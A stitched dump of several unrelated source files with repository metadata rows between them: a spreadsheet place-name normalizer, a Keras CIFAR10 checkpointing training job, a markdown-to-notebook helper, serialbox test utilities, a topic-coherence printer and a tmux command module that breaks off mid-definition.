ws.cell(row=iterationrow, column=targetcol).value = 'Philadelphia (Pennsylvania); Philadelphia County (Pennsylvania)'
print(ws.cell(row=iterationrow, column=targetcol).value)
elif testvar.find('Cleveland') != -1:
ws.cell(row=iterationrow, column=targetcol).value = 'Cleveland (Ohio); Cuyahoga County (Ohio)'
print(ws.cell(row=iterationrow, column=targetcol).value)
elif testvar.find('Okolona') != -1:
ws.cell(row=iterationrow, column=targetcol).value = 'Okolona (Ohio); Henry County (Ohio)'
print(ws.cell(row=iterationrow, column=targetcol).value)
elif testvar.find('Napoleon') != -1:
ws.cell(row=iterationrow, column=targetcol).value = 'Napoleon (Ohio); Henry County (Ohio)'
print(ws.cell(row=iterationrow, column=targetcol).value)
elif testvar.find('Upper Sandusky') != -1:
ws.cell(row=iterationrow, column=targetcol).value = 'Upper Sandusky (Ohio); Wyandot County (Ohio)'
print(ws.cell(row=iterationrow, column=targetcol).value)
elif testvar.find('Sandusky') != -1:
ws.cell(row=iterationrow, column=targetcol).value = 'Sandusky (Ohio); Erie County (Ohio)'
print(ws.cell(row=iterationrow, column=targetcol).value)
elif testvar.find('Mt. Vernon') != -1:
ws.cell(row=iterationrow, column=targetcol).value = 'Mt. Vernon (Ohio); Knox County (Ohio)'
print(ws.cell(row=iterationrow, column=targetcol).value)
elif testvar.find('Detroit') != -1:
ws.cell(row=iterationrow, column=targetcol).value = 'Detroit (Michigan); Wayne County (Michigan)'
print(ws.cell(row=iterationrow, column=targetcol).value)
elif testvar.find('Sylvania') != -1:
ws.cell(row=iterationrow, column=targetcol).value = 'Sylvania (Ohio); Lucas County (Ohio)'
print(ws.cell(row=iterationrow, column=targetcol).value)
elif testvar.find('Oregon') != -1:
ws.cell(row=iterationrow, column=targetcol).value = 'Oregon (Ohio); Lucas County (Ohio)'
print(ws.cell(row=iterationrow, column=targetcol).value)
elif testvar.find('Brooklyn') != -1:
ws.cell(row=iterationrow, column=targetcol).value = 'Brooklyn (Michigan); Jackson County (Michigan)'
print(ws.cell(row=iterationrow, column=targetcol).value)
elif testvar.find('Knoxville') != -1:
ws.cell(row=iterationrow, column=targetcol).value = 'Knoxville (Tennessee); Knox County (Tennessee)'
print(ws.cell(row=iterationrow, column=targetcol).value)
elif testvar.find('Ada, Ohio') != -1:
ws.cell(row=iterationrow, column=targetcol).value = 'Ada (Ohio); Hardin County (Ohio)'
print(ws.cell(row=iterationrow, column=targetcol).value)
elif testvar.find('Waterville') != -1:
ws.cell(row=iterationrow, column=targetcol).value = 'Waterville (Ohio); Lucas County (Ohio)'
print(ws.cell(row=iterationrow, column=targetcol).value)
elif testvar.find('Bowling Green') != -1:
ws.cell(row=iterationrow, column=targetcol).value = 'Bowling Green (Ohio); Wood County (Ohio)'
print(ws.cell(row=iterationrow, column=targetcol).value)
elif testvar.find('Perrysburg') != -1:
ws.cell(row=iterationrow, column=targetcol).value = 'Perrysburg (Ohio); Wood County (Ohio)'
print(ws.cell(row=iterationrow, column=targetcol).value)
elif testvar.find('Ottokee') != -1:
ws.cell(row=iterationrow, column=targetcol).value = 'Ottokee (Ohio); Fulton County (Ohio)'
print(ws.cell(row=iterationrow, column=targetcol).value)
elif testvar.find('Marblehead') != -1:
ws.cell(row=iterationrow, column=targetcol).value = 'Marblehead (Ohio); Ottawa County (Ohio)'
print(ws.cell(row=iterationrow, column=targetcol).value)
elif testvar.find('Delta') != -1:
ws.cell(row=iterationrow, column=targetcol).value = 'Delta (Ohio); Fulton County (Ohio)'
print(ws.cell(row=iterationrow, column=targetcol).value)
elif testvar.find('Genoa') != -1:
ws.cell(row=iterationrow, column=targetcol).value = 'Genoa (Ohio); Ottawa County (Ohio)'
print(ws.cell(row=iterationrow, column=targetcol).value)
elif testvar.find('Grand Rapids') != -1:
if testvar.find('Ohio') != -1:
ws.cell(row=iterationrow, column=targetcol).value = 'Grand Rapids (Ohio); Wood County (Ohio)'
print(ws.cell(row=iterationrow, column=targetcol).value)
elif testvar.find('Michigan') != -1:
ws.cell(row=iterationrow, column=targetcol).value = 'Grand Rapids (Michigan); Kent County (Michigan)'
print(ws.cell(row=iterationrow, column=targetcol).value)
elif testvar.find('Niagara Falls') != -1:
if testvar.find('New York') != -1:
ws.cell(row=iterationrow, column=targetcol).value = 'Niagara Falls (New York); Niagara County (New York)'
print(ws.cell(row=iterationrow, column=targetcol).value)
elif testvar.find('Canada') != -1:
ws.cell(row=iterationrow, column=targetcol).value = 'Niagara Falls (Canada)'
print(ws.cell(row=iterationrow, column=targetcol).value)
elif testvar.find('Buffalo') != -1:
if testvar.find('New York') != -1:
ws.cell(row=iterationrow, column=targetcol).value = 'Buffalo (New York); Erie County (New York)'
print(ws.cell(row=iterationrow, column=targetcol).value)
elif testvar.find('Galloway') != -1:
ws.cell(row=iterationrow, column=targetcol).value = 'Galloway (Ohio); Franklin County (Ohio)'
print(ws.cell(row=iterationrow, column=targetcol).value)
elif testvar.find('Bryan') != -1:
ws.cell(row=iterationrow, column=targetcol).value = 'Bryan (Ohio); Williams County (Ohio)'
print(ws.cell(row=iterationrow, column=targetcol).value)
elif testvar.find('Pemberville') != -1:
ws.cell(row=iterationrow, column=targetcol).value = 'Pemberville (Ohio); Wood County (Ohio)'
print(ws.cell(row=iterationrow, column=targetcol).value)
elif testvar.find('Bradner') != -1:
ws.cell(row=iterationrow, column=targetcol).value = 'Bradner (Ohio); Wood County (Ohio)'
print(ws.cell(row=iterationrow, column=targetcol).value)
elif testvar.find('Port Clinton') != -1:
ws.cell(row=iterationrow, column=targetcol).value = 'Port Clinton (Ohio); Ottawa County (Ohio)'
print(ws.cell(row=iterationrow, column=targetcol).value)
elif testvar.find('Monroeville') != -1:
ws.cell(row=iterationrow, column=targetcol).value = 'Monroeville (Ohio); Huron County (Ohio)'
print(ws.cell(row=iterationrow, column=targetcol).value)
elif testvar.find('Dundee') != -1:
ws.cell(row=iterationrow, column=targetcol).value = 'Dundee (Michigan); Monroe County (Michigan)'
print(ws.cell(row=iterationrow, column=targetcol).value)
elif testvar.find('Monroe') != -1:
ws.cell(row=iterationrow, column=targetcol).value = 'Monroe (Michigan); Monroe County (Michigan)'
print(ws.cell(row=iterationrow, column=targetcol).value)
elif testvar.find('Fremont') != -1:
ws.cell(row=iterationrow, column=targetcol).value = 'Fremont (Ohio); Sandusky County (Ohio)'
print(ws.cell(row=iterationrow, column=targetcol).value)
elif testvar.find('Fayette') != -1:
ws.cell(row=iterationrow, column=targetcol).value = 'Fayette (Ohio); Fulton County (Ohio)'
print(ws.cell(row=iterationrow, column=targetcol).value)
elif testvar.find('Springfield') != -1:
ws.cell(row=iterationrow, column=targetcol).value = 'Springfield (Ohio); Clark County (Ohio)'
print(ws.cell(row=iterationrow, column=targetcol).value)
elif testvar.find('Ann Arbor') != -1:
ws.cell(row=iterationrow, column=targetcol).value = 'Ann Arbor (Michigan); Washtenaw County (Michigan)'
print(ws.cell(row=iterationrow, column=targetcol).value)
elif testvar.find('Tiffin') != -1:
ws.cell(row=iterationrow, column=targetcol).value = 'Tiffin (Ohio); Seneca County (Ohio)'
print(ws.cell(row=iterationrow, column=targetcol).value)
elif testvar.find('Delphos') != -1:
ws.cell(row=iterationrow, column=targetcol).value = 'Delphos (Ohio)'
print(ws.cell(row=iterationrow, column=targetcol).value)
elif testvar.find('Sault St. Marie') != -1:
ws.cell(row=iterationrow, column=targetcol).value = 'Sault St. Marie (Michigan), Chippewa County (Michigan)'
print(ws.cell(row=iterationrow, column=targetcol).value)
elif testvar.find('Defiance') != -1:
ws.cell(row=iterationrow, column=targetcol).value = 'Defiance (Ohio); Defiance County (Ohio)'
print(ws.cell(row=iterationrow, column=targetcol).value)
elif testvar.find('Louisville') != -1:
ws.cell(row=iterationrow, column=targetcol).value = 'Louisville (Kentucky); Jefferson County (Kentucky)'
print(ws.cell(row=iterationrow, column=targetcol).value)
elif testvar.find('Put-in-Bay') != -1:
ws.cell(row=iterationrow, column=targetcol).value = 'Put-in-Bay Township (Ohio); Ottawa County (Ohio)'
print(ws.cell(row=iterationrow, column=targetcol).value)
elif testvar.find('St. Paul') != -1:
ws.cell(row=iterationrow, column=targetcol).value = 'Saint Paul (Minnesota); Ramsey County (Minnesota)'
print(ws.cell(row=iterationrow, column=targetcol).value)
elif testvar.find('Saint Paul') != -1:
ws.cell(row=iterationrow, column=targetcol).value = 'Saint Paul (Minnesota); Ramsey County (Minnesota)'
print(ws.cell(row=iterationrow, column=targetcol).value)
elif testvar.find('Providence') != -1:
ws.cell(row=iterationrow, column=targetcol).value = 'Providence Township (Ohio); Lucas County (Ohio)'
print(ws.cell(row=iterationrow, column=targetcol).value)
elif testvar.find('Winona') != -1:
ws.cell(row=iterationrow, column=targetcol).value = 'Winona (Minnesota); Winona County (Minnesota)'
print(ws.cell(row=iterationrow, column=targetcol).value)
elif testvar.find('Galveston') != -1:
ws.cell(row=iterationrow, column=targetcol).value = 'Galveston (Texas); Galveston County (Texas)'
print(ws.cell(row=iterationrow, column=targetcol).value)
elif testvar.find('Camden') != -1:
ws.cell(row=iterationrow, column=targetcol).value = 'Camden (New Jersey); Camden County (New Jersey)'
print(ws.cell(row=iterationrow, column=targetcol).value)
elif testvar.find('Swanton') != -1:
ws.cell(row=iterationrow, column=targetcol).value = 'Swanton (Ohio); Lucas County (Ohio)'
print(ws.cell(row=iterationrow, column=targetcol).value)
elif testvar.find('Highland Park') != -1:
ws.cell(row=iterationrow, column=targetcol).value = 'Highland Park (Michigan); Waryne County (Michigan)'
print(ws.cell(row=iterationrow, column=targetcol).value)
else :
print('No changes needed')
iterationrow = iterationrow + 1
wb.save("aalh_iit_rudolphgartnercollection.xlsx")
| 68.240437
| 130
| 0.630926
|
acff895cef9884f0d2770fb25e5b6ebafb30117e
| 6,984
|
py
|
Python
|
examples/pwr_run/checkpointing/socket_short/min_par/job9.py
|
boringlee24/keras_old
|
1e1176c45c4952ba1b9b9e58e9cc4df027ab111d
|
[
"MIT"
] | null | null | null |
examples/pwr_run/checkpointing/socket_short/min_par/job9.py
|
boringlee24/keras_old
|
1e1176c45c4952ba1b9b9e58e9cc4df027ab111d
|
[
"MIT"
] | null | null | null |
examples/pwr_run/checkpointing/socket_short/min_par/job9.py
|
boringlee24/keras_old
|
1e1176c45c4952ba1b9b9e58e9cc4df027ab111d
|
[
"MIT"
] | null | null | null |
"""
#Trains a ResNet on the CIFAR10 dataset.
"""
from __future__ import print_function
import keras
from keras.layers import Dense, Conv2D, BatchNormalization, Activation
from keras.layers import AveragePooling2D, Input, Flatten
from keras.optimizers import Adam
from keras.callbacks import ModelCheckpoint, LearningRateScheduler
from keras.callbacks import ReduceLROnPlateau, TensorBoard
from keras.preprocessing.image import ImageDataGenerator
from keras.regularizers import l2
from keras import backend as K
from keras.models import Model
from keras.datasets import cifar10
from keras.applications.mobilenet_v2 import MobileNetV2
from keras import models, layers, optimizers
from datetime import datetime
import tensorflow as tf
import numpy as np
import os
import pdb
import sys
import argparse
import time
import signal
import glob
import json
import send_signal
parser = argparse.ArgumentParser(description='Tensorflow Cifar10 Training')
parser.add_argument('--tc', metavar='TESTCASE', type=str, help='specific testcase name')
parser.add_argument('--resume', dest='resume', action='store_true', help='if True, resume training from a checkpoint')
parser.add_argument('--gpu_num', metavar='GPU_NUMBER', type=str, help='select which gpu to use')
parser.add_argument('--node', metavar='HOST_NODE', type=str, help='node of the host (scheduler)')
parser.set_defaults(resume=False)
args = parser.parse_args()
os.environ["CUDA_DEVICE_ORDER"]="PCI_BUS_ID"
os.environ["CUDA_VISIBLE_DEVICES"]=args.gpu_num
# Training parameters
batch_size = 128
args_lr = 0.01
epoch_begin_time = 0
job_name = sys.argv[0].split('.')[0]
save_files = '/scratch/li.baol/checkpoint_min_param/' + job_name + '*'
total_epochs = 4
starting_epoch = 0
# first step is to update the PID
pid_dict = {}
with open('pid_lock.json', 'r') as fp:
pid_dict = json.load(fp)
pid_dict[job_name] = os.getpid()
json_file = json.dumps(pid_dict)
with open('pid_lock.json', 'w') as fp:
fp.write(json_file)
os.rename('pid_lock.json', 'pid.json')
if args.resume:
save_file = glob.glob(save_files)[0]
# epochs = int(save_file.split('/')[4].split('_')[1].split('.')[0])
starting_epoch = int(save_file.split('/')[4].split('.')[0].split('_')[-1])
data_augmentation = True
num_classes = 10
# Subtracting pixel mean improves accuracy
subtract_pixel_mean = True
n = 3
# Model name, depth and version
model_type = args.tc #'P100_resnet50_he_256_1'
# Load the CIFAR10 data.
(x_train, y_train), (x_test, y_test) = cifar10.load_data()
# Normalize data.
x_train = x_train.astype('float32') / 255
x_test = x_test.astype('float32') / 255
# If subtract pixel mean is enabled
if subtract_pixel_mean:
x_train_mean = np.mean(x_train, axis=0)
x_train -= x_train_mean
x_test -= x_train_mean
print('x_train shape:', x_train.shape)
print(x_train.shape[0], 'train samples')
print(x_test.shape[0], 'test samples')
print('y_train shape:', y_train.shape)
# Convert class vectors to binary class matrices.
y_train = keras.utils.to_categorical(y_train, num_classes)
y_test = keras.utils.to_categorical(y_test, num_classes)
if args.resume:
print('resume from checkpoint')
model = keras.models.load_model(save_file)
else:
print('train from start')
model = models.Sequential()
base_model = MobileNetV2(weights=None, include_top=False, input_shape=(32, 32, 3), pooling=None)
#base_model.summary()
#pdb.set_trace()
model.add(base_model)
model.add(layers.Flatten())
#model.add(layers.BatchNormalization())
#model.add(layers.Dense(128, activation='relu'))
#model.add(layers.Dropout(0.5))
#model.add(layers.BatchNormalization())
#model.add(layers.Dense(64, activation='relu'))
#model.add(layers.Dropout(0.5))
#model.add(layers.BatchNormalization())
model.add(layers.Dense(10, activation='softmax'))
model.compile(loss='categorical_crossentropy',
optimizer=Adam(lr=args_lr),
metrics=['accuracy'])
#model.summary()
print(model_type)
#pdb.set_trace()
current_epoch = 0
################### connects interrupt signal to the process #####################
def terminateProcess(signalNumber, frame):
# first record the wasted epoch time
global epoch_begin_time
if epoch_begin_time == 0:
epoch_waste_time = 0
else:
epoch_waste_time = int(time.time() - epoch_begin_time)
epoch_waste_dict = {}
with open('epoch_waste.json', 'r') as fp:
epoch_waste_dict = json.load(fp)
epoch_waste_dict[job_name] += epoch_waste_time
json_file3 = json.dumps(epoch_waste_dict)
with open('epoch_waste.json', 'w') as fp:
fp.write(json_file3)
print('checkpointing the model triggered by kill -15 signal')
# delete whatever checkpoint that already exists
for f in glob.glob(save_files):
os.remove(f)
model.save('/scratch/li.baol/checkpoint_min_param/' + job_name + '_' + str(current_epoch) + '.h5')
print ('(SIGTERM) terminating the process')
checkpoint_dict = {}
with open('checkpoint.json', 'r') as fp:
checkpoint_dict = json.load(fp)
checkpoint_dict[job_name] = 1
json_file3 = json.dumps(checkpoint_dict)
with open('checkpoint.json', 'w') as fp:
fp.write(json_file3)
sys.exit()
signal.signal(signal.SIGTERM, terminateProcess)
#################################################################################
logdir = '/scratch/li.baol/tsrbrd_log/job_runs/' + model_type + '/' + job_name
tensorboard_callback = TensorBoard(log_dir=logdir)#, update_freq='batch')
class PrintEpoch(keras.callbacks.Callback):
def on_epoch_begin(self, epoch, logs=None):
global current_epoch
#remaining_epochs = epochs - epoch
current_epoch = epoch
print('current epoch ' + str(current_epoch))
global epoch_begin_time
epoch_begin_time = time.time()
my_callback = PrintEpoch()
callbacks = [tensorboard_callback, my_callback]
#[checkpoint, lr_reducer, lr_scheduler, tensorboard_callback]
# Run training
if not args.resume:
trainable_count = int(np.sum([K.count_params(p) for p in set(model.trainable_weights)]))
# send signal 'jobxx param xxxxx'
message = job_name + ' param ' + str(trainable_count)
send_signal.send(args.node, 10002, message)
# send signal to indicate checkpoint is qualified
message = job_name + ' ckpt_qual'
send_signal.send(args.node, 10002, message)
model.fit(x_train, y_train,
batch_size=batch_size,
epochs=round(total_epochs/2),
validation_data=(x_test, y_test),
shuffle=True,
callbacks=callbacks,
initial_epoch=starting_epoch,
verbose=1
)
# Score trained model.
scores = model.evaluate(x_test, y_test, verbose=1)
print('Test loss:', scores[0])
print('Test accuracy:', scores[1])
# send signal to indicate job has finished
message = job_name + ' finish'
send_signal.send(args.node, 10002, message)
| 31.04
| 118
| 0.703179
|
acff896af252fa2ff6dfdb7164ea3338a5a70aa6
| 2,862
|
py
|
Python
|
util/notebook_helpers.py
|
ChidinmaKO/noBSLAnotebooks
|
c0102473f1e6625fa5fb62768d4545059959fa26
|
[
"MIT"
] | 116
|
2016-04-20T13:56:02.000Z
|
2022-03-30T08:55:08.000Z
|
util/notebook_helpers.py
|
ChidinmaKO/noBSLAnotebooks
|
c0102473f1e6625fa5fb62768d4545059959fa26
|
[
"MIT"
] | 2
|
2021-07-01T17:00:38.000Z
|
2021-07-01T19:34:09.000Z
|
util/notebook_helpers.py
|
ChidinmaKO/noBSLAnotebooks
|
c0102473f1e6625fa5fb62768d4545059959fa26
|
[
"MIT"
] | 29
|
2017-02-04T05:22:23.000Z
|
2021-12-28T00:06:50.000Z
|
import re
HEADING_MARKERS = {
1:"# ",
2:"## ",
3:"### ",
4:"#### "
}
MARKDOWN_CELL_TEMPLATE = """
{
"cell_type": "markdown",
"metadata": {},
"source": [
"%s"
]
},"""
EMPTY_CODE_CELL = """
{
"cell_type": "code",
"execution_count": null,
"metadata": {
"collapsed": true
},
"outputs": [],
"source": []
},"""
def create_ipynb_json_from_md(md_source, extra_code_cells=2):
"""
Parses makdown syntax in `md_source` prepares JSON suitable
for copy pasting into an Jupyter notebook file.
"""
output = ""
leading_sp_re = re.compile(r"(?P<presp>\s*)(?P<rest>.*)")
list_item_re = re.compile(r"(?P<presp>\s*)[-|\*](?P<postsp>\s{1,4})(?P<rest>.*)")
# STATE
level = 0 # list level
indents = {
1:0, # indentation level for first-level lists (in spaces)
2:0, # indentation level for second-level lists (in spaces)
3:0, # indentation level for third-level lists (in spaces)
4:0
}
for line in md_source.splitlines():
if len(line.strip()) == 0: # skip blank lines
continue
list_item = list_item_re.match(line)
leading_sp = leading_sp_re.match(line)
if list_item:
# match list item
groups = list_item.groupdict()
presp, postsp, rest = groups['presp'], groups['postsp'], groups['rest']
rest_escaped = rest.replace("\\", "\\\\")
line_indent = len(presp) + 1 + len(postsp)
if level == 0: # A: start initial list
level = 1
indents[level] = line_indent
elif level >= 1: # B: already in list
if line_indent == indents[level]: # B1: continue list
pass
elif line_indent > indents[level]: # B2: start deeper list
level += 1
indents[level] = line_indent
elif line_indent < indents[level]: # B3: end list
if line_indent == indents[level-1]:
level = level - 1
elif line_indent == indents[level-2]:
level = level - 2
elif line_indent == indents[level-3]:
level = level - 3
else:
pass
# print actual json
output += MARKDOWN_CELL_TEMPLATE % (HEADING_MARKERS[level] + rest_escaped)
for i in range(0,extra_code_cells):
output += EMPTY_CODE_CELL
elif leading_sp:
groups = leading_sp.groupdict()
presp, rest = groups['presp'], groups['rest']
else:
pass
return output
| 31.108696
| 86
| 0.486723
|
acff8a438c60bbb9228f999031ffb1b74d62b532
| 632
|
py
|
Python
|
skvalidate/__init__.py
|
FAST-HEP/scikit-validate
|
7c6de2dfa8c86bf2be6df2302f9a200902775604
|
[
"Apache-2.0"
] | 2
|
2019-06-12T17:05:47.000Z
|
2019-09-25T13:13:31.000Z
|
skvalidate/__init__.py
|
FAST-HEP/scikit-validate
|
7c6de2dfa8c86bf2be6df2302f9a200902775604
|
[
"Apache-2.0"
] | 23
|
2019-05-21T15:30:11.000Z
|
2021-07-08T19:48:06.000Z
|
skvalidate/__init__.py
|
FAST-HEP/scikit-validate
|
7c6de2dfa8c86bf2be6df2302f9a200902775604
|
[
"Apache-2.0"
] | 2
|
2019-05-21T15:32:21.000Z
|
2021-05-17T18:43:36.000Z
|
# -*- coding: utf-8 -*-
"""Top-level package for scikit-validate."""
import logging
import os
__author__ = """FAST"""
__email__ = 'fast-hep@cern.ch'
__version__ = '0.4.3'
__skvalidate_root__ = os.path.dirname(__file__)
# logging
logger = logging.getLogger(__name__)
logger.setLevel(logging.DEBUG)
logger.propagate = False
# add loggers
ch = logging.StreamHandler()
if not os.environ.get("SK_DEBUG", False):
ch.setLevel(logging.INFO)
else:
ch.setLevel(logging.DEBUG)
# log format
formatter = logging.Formatter(
'%(asctime)s [%(name)s] %(levelname)s: %(message)s')
ch.setFormatter(formatter)
logger.addHandler(ch)
| 20.387097
| 57
| 0.713608
|
acff8add0e73df01acf5f14f35dc9b1446643467
| 3,254
|
py
|
Python
|
test/serialbox-python/sdb/regression/create_data.py
|
elsagermann/serialbox
|
c590561d0876f3ce9a07878e4862a46003a37879
|
[
"BSD-2-Clause"
] | 10
|
2017-04-18T14:28:07.000Z
|
2019-10-23T03:22:16.000Z
|
test/serialbox-python/sdb/regression/create_data.py
|
elsagermann/serialbox
|
c590561d0876f3ce9a07878e4862a46003a37879
|
[
"BSD-2-Clause"
] | 172
|
2017-02-16T14:24:33.000Z
|
2019-11-06T08:46:34.000Z
|
test/serialbox-python/sdb/regression/create_data.py
|
elsagermann/serialbox
|
c590561d0876f3ce9a07878e4862a46003a37879
|
[
"BSD-2-Clause"
] | 21
|
2016-12-15T15:22:02.000Z
|
2019-10-02T09:40:10.000Z
|
#!/usr/bin/python3
# -*- coding: utf-8 -*-
##===-----------------------------------------------------------------------------*- Python -*-===##
##
## S E R I A L B O X
##
## This file is distributed under terms of BSD license.
## See LICENSE.txt for more information.
##
##===------------------------------------------------------------------------------------------===##
import os
import sys
sys.path.insert(1, os.path.join(os.path.dirname(os.path.realpath(__file__)),
"../../../src/serialbox-python"))
import serialbox as ser
import numpy as np
from random import randint, random
class StencilUVWT(object):
def __init__(self, num_errors=0, is_error=None):
self.name = "StencilUVWT"
self.invocation_count = 0
self.num_errors = num_errors
dir = "./" + self.name + ("" if num_errors is 0 else "-error")
if num_errors == 0 and is_error:
dir += "-error"
self.serializer = ser.Serializer(ser.OpenModeKind.Write, dir, "stencil")
self.serializer.global_metainfo.insert("stencils", ["StencilUVWT"])
self.name = "StencilUVWT"
self.invocation_count = 0
np.random.seed(0)
self.u = np.random.rand(32, 34, 80)
self.v = np.random.rand(32, 34, 80)
self.w = np.random.rand(32, 34, 80)
self.t = np.random.rand(80)
self.tp = np.random.rand(32, 34)
def run(self, num=1):
for i in range(num):
self.stage_1()
self.stage_2()
self.invocation_count += 1
def stage_1(self):
self.serialize("in", 0, "stage_1", {"u": self.u, "v": self.v, "w": self.w, "tp": self.tp})
self.u += 1
self.v += 2
self.w += 3
self.tp += 4
self.serialize("out", 0, "stage_1", {"u": self.u, "v": self.v, "w": self.w, "tp": self.tp})
def stage_2(self):
self.serialize("in", 1, "stage_2", {"u": self.u, "v": self.v, "w": self.w, "t": self.t, "tp": self.tp})
self.u += 1
self.v += 2
self.w += 3
self.t += 4
self.tp += 5
for e in range(self.num_errors):
self.w[randint(0, self.w.shape[0] - 1),
randint(0, self.w.shape[1] - 1),
randint(0, self.w.shape[2] - 1)] = random()
# self.tp[randint(0, self.w.shape[0] - 1),
# randint(0, self.w.shape[1] - 1)] = random()
#
# self.t[randint(0, self.w.shape[0] - 1)] = random()
self.serialize("out", 1, "stage_2", {"u": self.u, "v": self.v, "w": self.w, "t": self.t, "tp": self.tp})
def serialize(self, intent, stage_id, stage_name, fields):
sp = ser.Savepoint(self.name + "__" + intent)
sp.metainfo.insert("stage_id", stage_id)
sp.metainfo.insert("stage_name", stage_name)
sp.metainfo.insert("invocation_count", self.invocation_count)
for name, field in fields.items():
self.serializer.write(name, sp, field)
if __name__ == '__main__':
#ser.Logging().enable()
s_uvwt = StencilUVWT()
s_uvwt.run(2)
s_uvwt_error = StencilUVWT(42000, True)
s_uvwt_error.run(2)
| 30.12963
| 112
| 0.503688
|
acff8b155e7f0e280f50878172703ea1bb8e0f61
| 977
|
py
|
Python
|
PrintResults.py
|
jhlau/topic-coherence-sensitivity
|
fb33fc72da83bee400b112a54317d9fd2fb66afe
|
[
"MIT"
] | 24
|
2016-04-08T14:32:42.000Z
|
2021-11-25T20:06:08.000Z
|
PrintResults.py
|
jhlau/topic-coherence-sensitivity
|
fb33fc72da83bee400b112a54317d9fd2fb66afe
|
[
"MIT"
] | 3
|
2019-09-07T15:49:14.000Z
|
2019-09-19T04:27:21.000Z
|
PrintResults.py
|
jhlau/topic-coherence-sensitivity
|
fb33fc72da83bee400b112a54317d9fd2fb66afe
|
[
"MIT"
] | 3
|
2019-08-16T02:26:42.000Z
|
2019-11-13T19:41:31.000Z
|
"""
Stdin: N/A
Stdout: N/A
Author: Jey Han Lau
Date: Mar 15
"""
import argparse
import sys
import cPickle
import codecs
#parser arguments
desc = "Print topic coherence results"
parser = argparse.ArgumentParser(description=desc)
#####################
#positional argument#
#####################
parser.add_argument("coherence_pickle", help="pickle file generated by run-npmi/wi.sh")
parser.add_argument("topic_file", help="text file containing the topic words")
###################
#optional argument#
###################
args = parser.parse_args()
#parameters
###########
#functions#
###########
######
#main#
######
data = cPickle.load(open(args.coherence_pickle))
topics = [ item.strip() for item in codecs.open(args.topic_file).readlines() ]
for t in sorted(data.keys()):
print "="*30
print "Topic =", topics[t]
for ci, c in enumerate(range(5, 21, 5)):
print "\tTop", c, "coherence score =", data[t][1][ci]
| 19.938776
| 87
| 0.596725
|
acff8b2450ee6b7486850d1bbd5b7645d03f6a63
| 15,969
|
py
|
Python
|
lib/command.py
|
sergei-dyshel/tmux-clost
|
699723565cfecc2ef2d6ededb258d57d467792f4
|
[
"MIT"
] | null | null | null |
lib/command.py
|
sergei-dyshel/tmux-clost
|
699723565cfecc2ef2d6ededb258d57d467792f4
|
[
"MIT"
] | null | null | null |
lib/command.py
|
sergei-dyshel/tmux-clost
|
699723565cfecc2ef2d6ededb258d57d467792f4
|
[
"MIT"
] | null | null | null |
import os.path
import re
import inspect
import sys
import json
import argparse
import shlex
import pipes
from .environment import env
from .config import config
from . import (alias, tmux, log, history, common, utils, output,
clipboard, context, split, snippet)
class Command(object):
requires_context = True
silent_no_context = False
server_side = True
opt_arg_defs = []
pos_arg_defs = []
def init(self, ctx, args):
self.ctx = ctx
self.args = args
self.options = config.options
self.options.update(config.commands.get(self.name(), {}))
if ctx:
self.options.update(ctx.commands.get(self.name(), {}))
def run(self):
raise NotImplementedError
def get_option(self, opt_name):
try:
return self.args[opt_name]
except KeyError:
return self.options[opt_name]
try:
return self.ctx.options[opt_name]
except KeyError:
return config.options[opt_name]
@classmethod
def name(cls):
return cls.__name__
@classmethod
def add_subparser(cls, subparsers):
subparser = subparsers.add_parser(utils.dashes(cls.name()))
subparser.set_defaults(cmd_class=cls)
for arg_name, arg_type, arg_help in cls.opt_arg_defs:
name_dashes = utils.dashes(arg_name)
if arg_type == bool:
subparser.add_argument('--' + name_dashes, dest=arg_name,
action='store_true', help=arg_help)
no_help = 'Do not ' + arg_help[0].lower() + arg_help[1:]
subparser.add_argument('--no-' + name_dashes, dest=arg_name,
action='store_false', help=no_help)
else:
subparser.add_argument('--' + name_dashes,
dest=arg_name, type=arg_type, help=arg_help)
for arg_name, arg_type, arg_help in cls.pos_arg_defs:
name_dashes = utils.dashes(arg_name)
subparser.add_argument(arg_name, type=arg_type, help=arg_help)
def strip_suggestion(self):
escape_code_list = utils.single_to_list(
self.get_option('suggestion_color_escape_code'))
if not escape_code_list:
return
_, splits = context.capture_escaped_line()
while splits:
last = splits[-1]
if context.is_escape_code(last):
del splits[-1]
continue
break
log.info('Splitted cmd with escape codes: {}', splits)
if not splits:
return
suggestion = splits[-1]
del splits[-1]
has_suggestion_escape = False
while splits:
last = splits[-1]
if not context.is_escape_code(last):
break
if last in escape_code_list:
has_suggestion_escape = True
break
del splits[-1]
if not has_suggestion_escape:
return
log.debug('Suggestion: {}', suggestion)
if self.ctx.cmd_line.endswith(suggestion):
self.ctx.cmd_line = self.ctx.cmd_line[0:-len(suggestion)]
else:
log.error('Error stripping suggestion')
class press_enter(Command):
silent_no_context = True
def run(self):
if self.ctx is None or not self.ctx.cmd_line:
tmux.send_keys(['Enter'])
log.info('Skipping empty command line')
return
with common.handle_exceptions(lambda: tmux.send_keys(['Enter'])):
cmd = self.ctx.cmd_line
newcmd = alias.expand(cmd, self.ctx.cfg)
if newcmd.strip() != cmd.strip():
cmd = newcmd
tmux.replace_cmd_line(
cmd, bracketed=self.get_option('bracketed_paste'))
tmux.send_keys(['Enter'])
with common.handle_exceptions():
log.info('Saving command "{}"', cmd)
history.save_to_history(self.ctx.name, cmd)
class expand_alias(Command):
def run(self):
cmd = self.ctx.cmd_line
exp = alias.expand(cmd, self.ctx.cfg)
if cmd != exp:
tmux.replace_cmd_line(
exp, bracketed=self.get_option('bracketed_paste'))
else:
raise common.ClostError('No alias found')
class escape_codes(Command):
requires_context = False
def run(self):
line, splits = context.capture_escaped_line()
print 'Full line:', repr(line)
print 'Splitted:\n', '\n'.join(repr(s) for s in splits)
class search_history(Command):
def run(self):
cmd = 'cat {} | cut -d" " -f2- '.format(
history.get_history_path(self.ctx.name))
cmd_line = self.ctx.cmd_line
if cmd_line:
escaped = cmd_line.replace('"', r'\"')
cmd = cmd + '| grep -F -- "{}"'.format(escaped)
line = split.select_split_pipe(cmd, self.get_option('selector'))
if line:
tmux.replace_cmd_line(
line, bracketed=self.get_option('bracketed_paste'))
class copy_output(Command):
def run(self):
out = output.get(self.ctx.pattern, self.get_option('max_lines'))
output_file = environment.expand_path(self.get_option('output_file'))
if output_file:
log.info('Saving output to {}', output_file)
with open(output_file, 'w') as f:
f.write(out)
clipboard.copy_file(output_file)
else:
clipboard.copy(out)
num_lines = out.count('\n') + 1
common.display_status('Captured {} lines (context: {})', num_lines,
self.ctx.name)
class last_output(Command):
def run(self):
out = self.ctx.get_output()
sys.stdout.write(out)
num_lines = out.count('\n') + 1
common.display_status('Captured {} lines (context: {})', num_lines,
self.ctx.name)
class path_picker(Command):
def run(self):
